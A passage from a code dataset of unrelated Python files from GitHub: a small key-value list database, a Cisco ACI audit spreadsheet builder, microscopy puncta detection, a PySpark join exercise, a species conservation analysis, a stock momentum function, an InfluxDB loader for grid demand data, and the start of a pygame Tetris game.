Lists.dataControl.changes(d)\r\n\r\n return True\r\n\r\n except KeyError as e:\r\n try:\r\n if str(e) == '\\'' + key +'\\'':\r\n d[key] = [[]]\r\n for value in values:\r\n d[key][0].append(value)\r\n\r\n Lists.dataControl.changes(d)\r\n\r\n return True\r\n\r\n except IndexError:\r\n return False\r\n\r\n except Exception as e:\r\n if str(e) == 'list index out of range':\r\n print(e)\r\n return False\r\n\r\n else:\r\n 
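In the snake record above, the apple position is snapped to the grid with `round(randrange(...) / block_size) * block_size`. Sampling a cell index first (an alternative sketch, not the original) keeps every spawn grid-aligned without the rounding step:

```python
def random_cell(span, block_size):
    # pick a whole cell, then convert to pixels
    return random.randrange(span // block_size) * block_size

# randAppleX = random_cell(display_width, block_size)
# randAppleY = random_cell(display_height, block_size)
```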
self.dataControl.log(e)\r\n return e\r\n\r\n def madd_column(self, key: str, count_columns: int):\r\n\r\n try:\r\n for i in range(count_columns):\r\n d[key].append([])\r\n\r\n Lists.dataControl.changes(d)\r\n\r\n return len(d[key])\r\n\r\n except KeyError as e:\r\n if str(e) == '\\'' + key +'\\'':\r\n d[key] = []\r\n for i in range(count_columns):\r\n d[key].append([])\r\n \r\n Lists.dataControl.changes(d)\r\n \r\n return len(d[key])\r\n\r\n \r\n except Exception as e:\r\n self.dataControl.log(e)\r\n return e\r\n\r\n def mmembers(self, key: str, column: int=0):\r\n '''Get members of a list'''\r\n try:\r\n return d.get(key, None)[column] if d.get(key, None) != None else None\r\n\r\n except Exception as e:\r\n self.dataControl.log(e)\r\n return e\r\n\r\n def mrem(self, key: str, values: list):\r\n '''Remove one or some values from a key'''\r\n try:\r\n removable = None\r\n count = 0\r\n number = 0\r\n for column in d[key]:\r\n for value in column:\r\n if value in values:\r\n removable = value\r\n count += 1\r\n \r\n for i in range(int(count)):\r\n d[key][number].remove(removable)\r\n\r\n number += 1\r\n \r\n Lists.dataControl.changes(d)\r\n\r\n return True\r\n\r\n except KeyError as e:\r\n return False\r\n\r\n except Exception as e:\r\n self.dataControl.log(e)\r\n return e\r\n\r\n def mclear(self, key: str):\r\n '''Clear all contents of a key'''\r\n try:\r\n d[key].clear()\r\n Lists.dataControl.changes(d)\r\n\r\n return True\r\n\r\n except KeyError as e:\r\n return False\r\n\r\n except Exception as e:\r\n self.dataControl.log(e)\r\n return e\r\n\r\n def mdel(self, key: str):\r\n '''Delete a key from databse'''\r\n try:\r\n del d[key]\r\n Lists.dataControl.changes(d)\r\n\r\n return True\r\n\r\n except KeyError as e:\r\n return False\r\n\r\n except Exception as e:\r\n self.dataControl.log(e)\r\n return e","repo_name":"MostafaMim04/MimDB-Beta","sub_path":"mimdb-beta/src/lists.py","file_name":"lists.py","file_ext":"py","file_size_in_byte":3565,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"26953234317","text":"### Pulls ACI data together to create Tables for output\n### Data processing?\nimport write.writexlsx.write2excel as w2x\nfrom pprint import pprint\n\n#region Build Portmap (Ethernet and Logical)\nbadFill = 'FFC7CE'\nbadFont = '9C0006'\ngoodFill = 'C6EFCE'\ngoodFont = '006100'\nneutralFill = 'FFEB9C'\nneutralFont = '9C5700'\nnormalFill = 'FFFFFF'\nnormalFont = '000000'\n\nportTests = [{'data': 'connected', 'fill': goodFill, 'font': goodFont},\n {'data': 'notconnect', 'fill': neutralFill, 'font': neutralFont},\n {'data': 'suspnd', 'fill': badFill, 'font': badFont},\n {'data': 'noOperMem', 'fill': badFill, 'font': badFont},\n {'data': 'down', 'fill': badFill, 'font': badFont},\n {'data': 'errDisable', 'fill': badFill, 'font': badFont},]\nportstatus = [{'key': 'state', 'test': portTests}]\n#endregion\n\n\ndef hwlist(filename, device_list): ### Build hw list and create excel doc\n wb = w2x.build_workbook(filename, TAB='HW List')\n aciTable = w2x.buildtable(device_list, 'ACI Fabric')\n aciTable.setworksheet(wb.active)\n aciTable.writetable()\n return wb\n\ndef aciTable(ws, obj, attr, hl):\n table = ''\n try:\n newobj = getattr(obj, attr)\n table = w2x.buildtable(newobj, hl)\n table.setworksheet(ws)\n except:\n print(f'Failed to build table ({hl}) in Tenant {a.name}')\n return table\n\ndef orderTable(priorTable, Table):\n try:\n row = priorTable.row + len(priorTable.rowobject)\n Table.row = row\n except:\n print('Failed for Order 
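A quick usage sketch for the MimDB `Lists` API that just ended; the key and values are made up:

```python
db = Lists()
db.madd("fruits", ["apple", "banana"])   # creates the key on first use
print(db.mmembers("fruits"))             # -> ['apple', 'banana']
db.mrem("fruits", ["banana"])
db.mdel("fruits")
```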
Table')\n\n\n\ndef tenantTabs(wb, tenantList):\n for a in tenantList:\n newtab = w2x.addTab(wb, a.name)\n # Build Tables for Tenant Tab\n bdTable = aciTable(newtab, a, 'bd', 'Bridge Domains')\n epgTable = aciTable(newtab, a, 'epg', 'End-point Groups')\n contractTable = aciTable(newtab, a, 'contract', 'Contracts')\n\n # Order Tables\n epgTable.orderTable(bdTable)\n contractTable.orderTable(epgTable)\n\n # Write Tables\n bdTable.writetable()\n epgTable.writetable()\n contractTable.writetable()\n\ndef aciBuildExcel(filename, fabricObj):\n newHW = []\n pprint('Building Excel')\n pprint(vars(fabricObj))\n for a in fabricObj.hwlist:\n newHW = newHW + a\n WB = hwlist(filename, newHW)\n # tenantTabs(WB, fabricObj.tenants)\n\n\n WB.save(filename)\n","repo_name":"smswanson/NetworkAudit","sub_path":"cisco/aci/audit/aciAudit.py","file_name":"aciAudit.py","file_ext":"py","file_size_in_byte":2375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9068753179","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 8 12:22:20 2021\n\n@author: surbhitwagle\n\"\"\"\n\nimport numpy as np\nimport os\nfrom math import sqrt\nimport matplotlib.pyplot as plt\nfrom skimage.feature import blob_dog, blob_log, blob_doh\n\nfrom skimage.draw import polygon, disk\n\nfrom .PathFinding import GetAllpointsonPath\nimport json\nimport csv\n\nclass Puncta:\n\n def __init__(self,location,radius,stats,between_cp,distance,struct,channel,snapshot):\n self.location = location\n self.radius = radius\n self.max = stats[0]\n self.min = stats[1]\n self.mean = stats[2]\n self.std = stats[3]\n self.median = stats[4]\n self.between = between_cp\n self.distance = distance\n self.struct = struct\n self.channel = channel\n self.snapshot = snapshot\n\nclass PunctaDetection:\n \"\"\"\n class that holds meta data for puncta detection and methods for puncta stats calculations\n \"\"\"\n\n def __init__(self, SimVars, tiff_Arr, somas, dendrites, dend_thresh=0.75,soma_thresh=0.5):\n self.Dir = SimVars.Dir\n self.tiff_Arr = tiff_Arr\n self.somas = somas \n self.dendrites = dendrites \n self.channels = SimVars.Channels\n self.snaps = SimVars.Snapshots\n self.scale = SimVars.Unit \n self.dend_thresh = dend_thresh\n self.soma_thresh = soma_thresh\n self.SimVars = SimVars\n\n def isBetween(self, a, b, c):\n \"\"\"\n function that checks if c lies on perpendicular space between line segment a to b\n input: roi consecutive points a,b and puncta center c\n output: True/False\n \"\"\"\n sides = np.zeros(3)\n sides[0] = (a[0] - b[0]) ** 2 + (a[1] - b[1]) ** 2 # ab\n original = sides[0]\n sides[1] = (b[0] - c[0]) ** 2 + (b[1] - c[1]) ** 2 # bc\n sides[2] = (c[0] - a[0]) ** 2 + (c[1] - a[1]) ** 2 # ca\n sides = np.sort(sides)\n if sides[2] > (sides[1] + sides[0]) and sides[2] != original:\n return False\n\n return True\n\n def Perpendicular_Distance_and_POI(self, a, b, c):\n \"\"\"\n distance between two parallel lines, one passing (line1, A1 x + B1 y + C1 = 0) from a and b\n and second one (line 2, A1 x + B1 y + C2 = 0) parallel to line1 passing from c is given\n |C1-C2|/sqrt(A1^2 + B1^2)\n\n input: roi consecutive points a,b and puncta center c\n output: Perpendicular from line segment a to b and point of intersection at the segment\n \"\"\"\n m = (a[1] - b[1]) / (a[0] - b[0] + 1e-18)\n if m == 0:\n m = 1e-9\n c1 = a[1] - m * a[0]\n c2 = c[1] - m * c[0]\n dist = np.absolute(c1 - c2) / np.sqrt(1 + m**2)\n m_per = -1 / m\n c3 = c[1] - m_per * c[0]\n x_int = (c3 - c1) / (m 
- m_per) * 1.0\n y_int = (m_per * x_int + c3) * 1.0\n\n ax_int = np.sqrt((a[0] - x_int) ** 2 + (a[1] - y_int))\n bx_int = np.sqrt((b[0] - x_int) ** 2 + (b[1] - y_int))\n ab = np.sqrt((a[0] - b[0]) ** 2 + (a[1] - b[1]) ** 2)\n return x_int, y_int, dist\n\n def GetClosestRoiPoint(self, dendrite, point):\n \"\"\"\n function that finds closest roi point if point is not on dendrite\n input: dendrite rois,point\n output: distance from the origin of the dendrite\n \"\"\"\n min_dist = 10**18\n prev = [dendrite[0][0], dendrite[1][0]]\n dist_from_origin = 0\n closest_p = [0, 0]\n closed_p_idx = 0\n for idx, x in enumerate(dendrite[0][:]):\n y = dendrite[1][idx]\n a = [x, y]\n dist = np.sqrt((point[1] - a[1]) ** 2 + (point[0] - a[0]) ** 2)\n if dist < min_dist:\n min_dist = dist\n dist_from_origin += np.sqrt(\n (prev[1] - a[1]) ** 2 + (prev[0] - a[0]) ** 2\n )\n closest_p = a\n closed_p_idx = idx\n prev = a\n return dist_from_origin\n\n def Is_On_Dendrite(self, dendrite, point, max_dist):\n \"\"\"\n function that checks on which segment of the dendrite the point is present (if)\n input: dendrite,point,max_dist\n output: True/False and scaled distance from the origin of the dendrite\n \"\"\"\n length_from_origin = 0\n prev_distance = 10**20\n for idx, x in enumerate(dendrite[0][:-1]):\n y = dendrite[1][idx]\n a = [x, y]\n b = [dendrite[0][idx + 1], dendrite[1][idx + 1]]\n if self.isBetween(a, b, point):\n x_int, y_int, distance = self.Perpendicular_Distance_and_POI(\n a, b, point\n )\n if distance <= max_dist:\n length_from_origin += np.sqrt(\n (y_int - a[1]) ** 2 + (x_int - a[0]) ** 2\n )\n return True, length_from_origin * self.scale\n length_from_origin += np.sqrt((b[1] - a[1]) ** 2 + (b[0] - a[0]) ** 2)\n\n length_from_origin = self.GetClosestRoiPoint(dendrite, point)\n return False, length_from_origin * self.scale\n\n # set somatic = False for dendritic punctas\n def GetPunctaStats(self, x, y, r, original_img):\n \"\"\"\n function that claculates the stats of gaussian puncta centered at x,y with radius r\n input: x,y, r and original image called by PunctaDetection class object\n output: list that includes the max, min,mean,std and median of the pixels in circle at x,y with radius r\n \"\"\"\n #\n img = np.zeros(original_img.shape, dtype=np.uint8)\n rr, cc = disk((y, x), r, shape=original_img.shape)\n img[rr, cc] = 1\n f_img = np.multiply(original_img, img)\n f_img_data = original_img[np.nonzero(f_img)]\n puncta_stats = [\n f_img_data.max(),\n f_img_data.min(),\n f_img_data.mean(),\n f_img_data.std(),\n np.median(f_img_data),\n ]\n return puncta_stats\n\n def GetPunctas(self,Soma=True):\n \"\"\"\n function that does the puncta detection\n input: none, called by PunctaDetection class object\n output: two dictionaries that stores list of puncta stats for each puncta element wise (soma/dendrite)\n \"\"\"\n NoDendrite = False\n all_c_t_somatic_puncta = []\n all_c_t_dendritic_puncta = []\n for t in range(self.snaps):\n all_c_somatic_puncta = []\n all_c_dendritic_puncta = []\n for ch in range(self.channels):\n\n orig_img = self.tiff_Arr[t, ch, :, :].astype(float)\n if(Soma):\n somatic_puncta,anti_soma = self.GetPunctasSoma(orig_img,ch,t)\n all_c_somatic_puncta.append(somatic_puncta)\n else:\n anti_soma = np.ones(np.shape(orig_img), \"uint8\")\n try:\n dendritic_puncta = self.GetPunctasDend(orig_img,anti_soma,ch,t)\n except:\n NoDendrite = True\n dendritic_puncta = []\n\n all_c_dendritic_puncta.append(dendritic_puncta)\n all_c_t_somatic_puncta.append(all_c_somatic_puncta)\n 
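The perpendicular-foot computation above works through slopes, which is why it needs the `1e-18` guard against vertical segments. A dot-product projection (an equivalent sketch, not the source implementation) has no special case:

```python
import numpy as np

def foot_of_perpendicular(a, b, c):
    # project c onto the line through a and b
    a, b, c = (np.asarray(p, dtype=float) for p in (a, b, c))
    ab = b - a
    t = np.dot(c - a, ab) / np.dot(ab, ab)
    foot = a + t * ab
    return foot, np.linalg.norm(c - foot)   # intersection point and distance
```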
all_c_t_dendritic_puncta.append(all_c_dendritic_puncta)\n if(not NoDendrite):\n self.SimVars.frame.set_status_message.setText(\"Punctas are available on all snaphshots/channels\")\n else:\n self.SimVars.frame.set_status_message.setText(\"Punctas are available on all snaphshots/channels, but there was no dendrite, so no dendritic puncta\")\n return all_c_t_somatic_puncta, all_c_t_dendritic_puncta\n\n def GetPunctasSoma(self,orig_img,ch,t_snape):\n \"\"\"Detects and returns somatic puncta in the given image.\n\n Performs puncta detection on the soma regions of the image and returns the detected puncta.\n\n Args:\n orig_img: The original image in which puncta are to be detected.\n\n Returns:\n somatic_puncta: A list of Puncta objects representing the detected somatic puncta.\n anti_soma: An anti-soma image obtained by subtracting soma regions from the original image.\n \"\"\"\n somatic_puncta = []\n\n soma_img = np.zeros(np.shape(orig_img), \"uint8\")\n anti_soma = np.ones(np.shape(orig_img), \"uint8\")\n\n for i,soma_instance in enumerate(self.somas):\n lsm_img = np.zeros(np.shape(orig_img), \"uint8\")\n\n xs = soma_instance[:, 0]\n ys = soma_instance[:, 1]\n\n rr, cc = polygon(ys, xs, lsm_img.shape)\n lsm_img[rr, cc] = 1\n\n anti_soma = np.multiply(anti_soma, 1 - lsm_img)\n soma_img = np.multiply(orig_img, lsm_img)\n t = np.max(orig_img[rr,cc])*self.soma_thresh\n blobs_log = blob_log(soma_img, threshold=t,max_sigma=1)\n blobs_log[:, 2] = blobs_log[:, 2] * sqrt(2)\n\n for blob in blobs_log:\n y, x, r = blob\n puncta_stats = self.GetPunctaStats(x, y, r, orig_img)\n sp = Puncta([x,y],r,puncta_stats,False,0,i,ch,t_snape)\n somatic_puncta.append(sp)\n\n return somatic_puncta,anti_soma\n\n def GetPunctasDend(self,orig_img,anti_soma,ch,t_snape):\n\n \"\"\"Detects and returns dendritic puncta in the given image.\n\n Performs puncta detection on the dendrite regions of the image and returns the detected puncta.\n\n Args:\n orig_img: The original image in which puncta are to be detected.\n anti_soma: The anti-soma image obtained by subtracting soma regions from the original image.\n\n Returns:\n dendritic_puncta: A list of Puncta objects representing the detected dendritic puncta.\n \"\"\"\n\n dendritic_puncta = []\n lsm_img = np.zeros(np.shape(orig_img), \"uint8\")\n\n dendrite_img = np.zeros(np.shape(orig_img), \"uint8\")\n dilated = np.zeros(np.shape(orig_img), \"uint8\")\n\n for i,dendrite_instance in enumerate(self.dendrites):\n dilated = dendrite_instance.get_dendritic_surface_matrix()\n dilated = np.multiply(anti_soma, dilated)\n xy = GetAllpointsonPath(dendrite_instance.control_points)[:, :]\n xs = xy[:, 0]\n ys = xy[:, 1]\n ## uncomment if you don't want to repeat dendritic punctas in overlapping dendritic parts\n # anti_soma = np.multiply(anti_soma,1 - dilated)\n dend_img = np.multiply(dilated, orig_img)\n filtered_dend_img = dend_img[np.nonzero(dend_img)]\n t = np.quantile(filtered_dend_img, self.dend_thresh)\n dend_blobs_log = blob_log(dend_img, threshold=t,max_sigma=1)\n dend_blobs_log[:, 2] = dend_blobs_log[:, 2] * sqrt(2)\n dp = []\n for blob in dend_blobs_log:\n y, x, r = blob\n on_dendrite, distance_from_origin = self.Is_On_Dendrite(\n [xs, ys], [x, y], dendrite_instance.dend_stat[:,2].max()\n )\n puncta_stats = self.GetPunctaStats(x, y, r, orig_img)\n dp = Puncta([x,y],r,puncta_stats,on_dendrite,distance_from_origin,i,ch,t_snape)\n dendritic_puncta.append(dp)\n\n return dendritic_puncta\n\ndef save_puncta(puncta_Dir,punctas,xLims):\n \"\"\"Saves the detected puncta to files.\n\n 
This method creates a directory for puncta files and subdirectories for different parameters.\n It retrieves the current slider values for half width, dendritic threshold, and somatic threshold.\n The somatic and dendritic punctas are obtained from the punctas list and flattened.\n The somatic punctas are saved to a JSON file under the 'soma_puncta.json' filename.\n The dendritic punctas are saved to a JSON file under the 'dend_puncta.json' filename.\n Both files are stored in the corresponding subdirectory of the puncta directory.\n \"\"\"\n \n if(len(xLims[0])==0):\n Lims = np.array(0)\n else:\n Lims = np.array([xLims[0][0],xLims[1][0]])\n\n somatic_punctas,dendritic_punctas = punctas[0],punctas[1]\n somatic_punctas_flat = [item for sublist in somatic_punctas for subsublist in sublist for item in (subsublist if isinstance(subsublist, list) else [subsublist])]\n dendritic_punctas_flat = [item for sublist in dendritic_punctas for subsublist in sublist for item in (subsublist if isinstance(subsublist, list) else [subsublist])]\n try:\n for sp in somatic_punctas_flat:\n sp.location = (location - Lims).tolist()\n except:\n pass\n try:\n for dp in dendritic_punctas_flat:\n dp.location = (location - Lims).tolist()\n except:\n pass\n\n with open(\n puncta_Dir + \"soma_puncta.json\",\n \"w\",\n ) as f:\n json.dump([vars(P) for P in somatic_punctas_flat], f, indent=4)\n with open(\n puncta_Dir + \"dend_puncta.json\",\n \"w\",\n ) as f:\n json.dump([vars(P) for P in dendritic_punctas_flat], f, indent=4)\n\n PunctaSave_csv(puncta_Dir,somatic_punctas_flat,dendritic_punctas_flat)\n\ndef PunctaSave_csv(Dir,somatic_punctas_flat,dendritic_punctas_flat):\n \"\"\"\n Saves somatic and dendritic puncta data to separate CSV files.\n\n Args:\n Dir (str): Directory path where the CSV files will be saved.\n somatic_punctas_flat (list): List of somatic puncta objects.\n dendritic_punctas_flat (list): List of dendritic puncta objects.\n\n Returns:\n None\n \"\"\"\n custom_header = ['','channel','snapshot','location','radius','max','min','mean','std','median','distance']\n\n csv_file_path = Dir+'soma_puncta.csv'\n with open(csv_file_path, 'w', newline='') as file:\n writer = csv.writer(file)\n writer.writerow(custom_header) \n for i,p in enumerate(somatic_punctas_flat):\n row = ['Puncta: '+str(i),p.channel,p.snapshot,str(p.location),\n p.radius,p.max,p.min,p.mean,p.std,p.median,p.distance]\n writer.writerow(row)\n\n csv_file_path = Dir+'dend_puncta.csv'\n with open(csv_file_path, 'w', newline='') as file:\n writer = csv.writer(file)\n writer.writerow(custom_header) \n for i,p in enumerate(dendritic_punctas_flat):\n row = ['Puncta: '+str(i),p.channel,p.snapshot,str(p.location),\n p.radius,p.max,p.min,p.mean,p.std,p.median,p.distance]\n writer.writerow(row)\n","repo_name":"phil-fill/SpyDen","sub_path":"App/PunctaDetection.py","file_name":"PunctaDetection.py","file_ext":"py","file_size_in_byte":14480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2797610071","text":"from requests.utils import cookiejar_from_dict\n\n\nfrom http.cookies import SimpleCookie\nfrom requests.utils import cookiejar_from_dict\n\n### HELP FUNCTION ###\ndef parse_cookie_string(cookie_string):\n cookie = SimpleCookie()\n cookie.load(cookie_string)\n cookies_dict = {}\n cookiejar = None\n for k, m in cookie.items():\n cookies_dict[k] = m.value\n cookiejar = cookiejar_from_dict(cookies_dict,\n cookiejar=None,\n overwrite=True)\n return 
cookiejar\n\n","repo_name":"onewesong/MiService","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"7835100256","text":"# The dataframes (pyspark.sql.DataFrame) define products, categories and the\n# relationships between them. One product may belong to many categories and\n# one category may contain many products. Write a method using PySpark that\n# returns all products with their categories (a dataframe with the set of all\n# «product name - category name» pairs). The resulting dataframe must also\n# include products that have no categories.\n\nfrom pyspark.sql import SparkSession, DataFrame\n\n\nspark = SparkSession.builder.appName(\"dataframes_task\").getOrCreate()\n\ncategories_table = spark.createDataFrame([\n    (1, \"Category 1\"),\n    (2, \"Category 2\"),\n    (3, \"Category 3\"),\n    (4, \"Category 4\"),\n    (5, \"Category 5\"),\n    (6, \"Category 6\"),],\n    [\"id\", \"category_name\"],\n)\n\nproducts_table = spark.createDataFrame([\n    (1, \"Product 1\"),\n    (2, \"Product 2\"),\n    (3, \"Product 3\"),\n    (4, \"Product 4\"),\n    (5, \"Product 5\"),\n    (6, \"Product 6\"),\n    (7, \"Product 7\"),\n    (8, \"Product 8\"),\n    (9, \"Product 9\"),\n    (10, \"Product 10\"), ],\n    [\"id\", \"product_name\", ]\n)\n\n\nER_table_products_vs_categories = spark.createDataFrame([\n    (1, 1),\n    (2, 3),\n    (3, 2),\n    (3, 4),\n    (6, 4),\n    (4, 5),\n    (5, 6),\n    (6, 7),\n    (6, 8),\n    (4, 2),\n    (1, 8),\n    (4, 9),\n    (1, 10)],\n    [\"category_id\", \"product_id\", ]\n)\n\n\n\n\ndf_data = (products_table.join(ER_table_products_vs_categories,\n            products_table.id == ER_table_products_vs_categories.product_id, how='left')\n    .join(categories_table,\n          ER_table_products_vs_categories.category_id == categories_table.id, how='left')\n    .select(['category_name', 'product_name'])\n)\n\ndf_data.orderBy(\"category_id\", \"product_id\", ).show(truncate=True)\n\n# I first learned about pySpark today from your test task; I hope this shows\n# that I can quickly get up to speed on a topic that is new to me, without\n# anyone guiding me - google will help me).","repo_name":"kireev20000/MindBox_Test_Task","sub_path":"task_2_pyspark_DataFrame.py","file_name":"task_2_pyspark_DataFrame.py","file_ext":"py","file_size_in_byte":2296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74034213673","text":"import pandas as pd\nfrom matplotlib import pyplot as plt\n\nspecies = pd.read_csv('species_info.csv')\n# print(species.head())\n\n# number of different species\nspecies_count = species.scientific_name.nunique()\n# print(species_count)\n\n# different category\nspecies_type = species.category.unique()\n# print(species_type)\n\n# different conservation status\nconservation_statuses = species.conservation_status.unique()\n# print(conservation_statuses)\n\n# Analyze Species Conservation Status\nconservation_counts = species.groupby('conservation_status').scientific_name.nunique().reset_index()\n# print(conservation_counts)\n\nspecies.fillna('No Intervention', inplace = True)\nconservation_counts_fixed = species.groupby('conservation_status').scientific_name.nunique().reset_index()\n# print(conservation_counts_fixed)\n\n# Plotting Conservation Status by Species\nspecies.fillna('No Intervention', inplace = True)\nprotection_counts = species.groupby('conservation_status') \\\n    .scientific_name.nunique() \\\n    .reset_index().sort_values(by='scientific_name')\n\n# num_species = protection_counts.scientific_name\n# status = 
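Because both joins in the PySpark record use `how='left'`, products without categories survive with a null `category_name`. If a readable label is preferred, one optional follow-up (an assumption, not part of the task) is:

```python
from pyspark.sql import functions as F

df_labeled = df_data.withColumn(
    "category_name",
    F.coalesce(F.col("category_name"), F.lit("No category")),
)
```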
protection_counts.conservation_status\n\n# plt.figure(figsize=(10, 4))\n# ax = plt.subplot()\n# plt.bar(range(len(num_species)), num_species)\n# ax.set_xticks(range(len(status)))\n# ax.set_xticklabels(status)\n# plt.xlabel('Conservation Status')\n# plt.ylabel('Number of Species')\n# plt.title('Conservation Status by Species')\n# plt.show()\n\nspecies['is_protected'] = species.conservation_status \\\n .apply(lambda status: True\n if status != 'No Intervention'\n else False)\ncategory_counts = species.groupby(['category', 'is_protected']) \\\n .scientific_name.nunique().reset_index()\n# print(category_counts)\n\ncategory_pivot = category_counts.pivot(\n columns = 'is_protected',\n index = 'category',\n values = 'scientific_name').reset_index()\ncategory_pivot.columns = ['category', 'not_protected', 'protected']\n# print(category_pivot)\n\ncategory_pivot['percent_protected'] = category_pivot.protected / (category_pivot.protected + category_pivot.not_protected)\nprint(category_pivot)\n\nfrom scipy.stats import chi2_contingency\n\ncontingency_bird_mammal = [[category_pivot.iat[3,2], category_pivot.iat[3,1]],\n [category_pivot.iat[1,2], category_pivot.iat[1,1]]]\n\n\npval_bird_mammal = chi2_contingency(contingency_bird_mammal)[1]\nprint('{:.2f}%'.format(pval_bird_mammal*100))\n\ncontingency_reptile_mammal = [[category_pivot.iat[3,2], category_pivot.iat[3,1]],\n [category_pivot.iat[5,2], category_pivot.iat[5,1]]]\npval_reptile_mammal = chi2_contingency(contingency_reptile_mammal)[1]\nprint('{:.2f}%'.format(pval_reptile_mammal*100))\n","repo_name":"LucasBoTang/Codecademy_Introduction_to_Data_Analysis","sub_path":"final_project_biodiversity/01endangered_species.py","file_name":"01endangered_species.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32656693406","text":"# -*- coding: UTF-8 -*-\n\"\"\":mod:`cumulative.py` is used to compute cumulative returns; also known as\nmomentum.\n\"\"\"\nfrom datetime import datetime, timedelta\n\ndef ret(data):\n \"\"\" Computes the cumulative returns (momentum) of a security.\n\n Parameters:\n - `data` : :class:`list` of :class:`tuples`\n\n .. note::\n The function argument is built by :py:func:`api.tsd`, it is\n structured as follow: ``[(datetime.datetime(2019, 4, 18, 0, 0), 203.86)]`` .\n\n The function uses :mod:`datetime` to determine the dates between which\n the momentum shall be calculated. 
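A tiny standalone illustration of the `chi2_contingency` call used in the species record; the counts are invented, not taken from the dataset:

```python
from scipy.stats import chi2_contingency

# rows: two species categories; columns: [protected, not protected]
table = [[30, 146],
         [75, 413]]
chi2, pval, dof, expected = chi2_contingency(table)
print(f"p = {pval:.3f}")   # p > 0.05 -> no significant difference in rates
```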
A new :class:`list` containing only the\n    values in the right time frame is built and passed to\n    :py:func:`cumulative.momentum`.\n\n    Returns the momentum of the security (:class:`float`)\n    \"\"\"\n    vector = []\n    today = datetime.today()\n    delta1 = timedelta(weeks = 8)\n    delta2 = timedelta(weeks = 52)\n    two_m = today - delta1\n    one_y = today - delta2\n    # filters the list according to the date of the closing value\n    for item in data:\n        if item[0] <= two_m and item[0] >= one_y:\n            vector.append(item[1])\n    # computes the cumulative returns for the filtered list\n    cmr = momentum(vector)\n    return cmr\n\ndef momentum(vector):\n    \"\"\" Computes the momentum of a vector.\n\n    Parameters:\n    - `vector` : :class:`list` of :class:`floats`\n\n    Momentum is computed as follows:\n    - momentum = 100*(new - old)/old\n\n    Returns the momentum of the vector (:class:`float`)\n    \"\"\"\n    return 100*((vector[0] - vector[-1])/vector[-1])\n","repo_name":"epfeff/smartbetas","sub_path":"smartbetas/cumulative.py","file_name":"cumulative.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"6718215002","text":"from src.get_data.lee_ree import consulta_ree_hour\nfrom src.get_data.analisis_ree import widget_caract \nfrom dotenv import load_dotenv\nimport datetime as dt\nimport sys\nsys.path.insert(1, '../')\nfrom src.connect_db import client_influx\n\ndef main():\n    # function to read from the REE API that needs no KEY; this function asks\n    # for the import interval and then calls the hourly reader in\n    # lee_ree and writes the result to the influx database\n\n    diff=dt.timedelta(days=15)\n    data_ini=dt.datetime(*pregunta_fecha(\"begins\"),0,0)\n    data_fin=dt.datetime(*pregunta_fecha(\"ends\"),0,0)\n    while data_fin>data_ini:\n        data_fin_sample=data_ini+diff\n        if data_fin_sample>data_fin:\n            data_fin_sample=data_fin\n\n        print('*** querying REE from ',data_ini, \" to \", data_fin_sample )\n        data=consulta_ree_hour('demanda','demanda-tiempo-real',data_ini,data_fin_sample)\n        if data==False:\n            print('Error querying data')\n            return False\n        print('*** writing from ',data_ini, \" to \", data_fin_sample )\n        escribe_influx('demanda-real',data[0]['attributes']['values'])\n        escribe_influx('demanda-programada',data[1]['attributes']['values'])\n        escribe_influx('demanda-prevista',data[2]['attributes']['values'])\n\n        data_ini=data_fin_sample\n\n    print('*** finished writing demanda-tiempo-real to db_influx ***')\n    client_influx.close()\n\ndef escribe_influx(table,values):\n    # writes to influx; table is a string with the name of the data series \n    # and values are dictionaries with date/time and percentage values\n    \n    write_api = client.write_api(write_options=SYNCHRONOUS)\n    data = \"mem,host=host1 used_percent=23.43234543\"\n    write_api.write(bucket, org, data)\n    \n    dbs=client_influx.get_list_database()\n    dbs_list=[]\n    if not isinstance(dbs,list):\n        for key, value in dbs.iteritems():\n            dbs_list.append([value])\n\n    if 'db_ereal' not in dbs_list:\n        client_influx.create_database('db_ereal')\n\n    client_influx.switch_database('db_ereal')\n\n    for value in values:\n        P=Point(\"\")\n        write_api(buket=\"ereal\", record=P)\n        client_influx.write_points(json_body)\n\ndef pregunta_fecha(pregunta):\n    check=False\n    while check==False:\n        var=input(\" InfluxDB process - Please introduce the date when the importation \" + pregunta + \" [YYYY/MM/DD] (i.e 2020/10/01):\").split(\"/\")\n        try:\n            var=[int(e) for e in var]\n            
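`escribe_influx` above mixes the influxdb 1.x client (`get_list_database`, `switch_database`, `write_points`) with 2.x idioms (`write_api`, `Point`), so it cannot run as written. A minimal sketch that sticks to the 1.x `influxdb` client; the field name and the shape of `values` (REE indicators carry `datetime` and `value` keys) are assumptions:

```python
def escribe_influx_v1(client, table, values):
    points = [{
        "measurement": table,
        "time": v["datetime"],                    # ISO-8601 timestamp
        "fields": {"value": float(v["value"])},
    } for v in values]
    client.write_points(points, database="db_ereal")
```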
except ValueError:\n            print(\"Please introduce a valid date\")\n\n        if sum([isinstance(e,int) for e in var])==3:\n            if var[0]>2019 and var[0]<=dt.datetime.now().year:\n                try:\n                    dt.datetime(year=var[0],month=var[1],day=var[2])\n                    check=True\n                except ValueError:\n                    print(\"Please introduce a valid date\")\n                    pass\n    return var\n\n\n\n\n\n\nif __name__==\"__main__\":\n    main()\n","repo_name":"yuvtorres/energia-real","sub_path":"src/get_data/carga_influx.py","file_name":"carga_influx.py","file_ext":"py","file_size_in_byte":2999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"4420355285","text":"import random\r\nimport pygame\r\nimport sys\r\n\r\nclass Panel(object): \r\n    rect_arr=[] \r\n    moving_block=None \r\n    def __init__(self, bg, block_size, position):\r\n        self._bg=bg\r\n        self._x,self._y,self._width,self._height=position\r\n        self._block_size=block_size\r\n        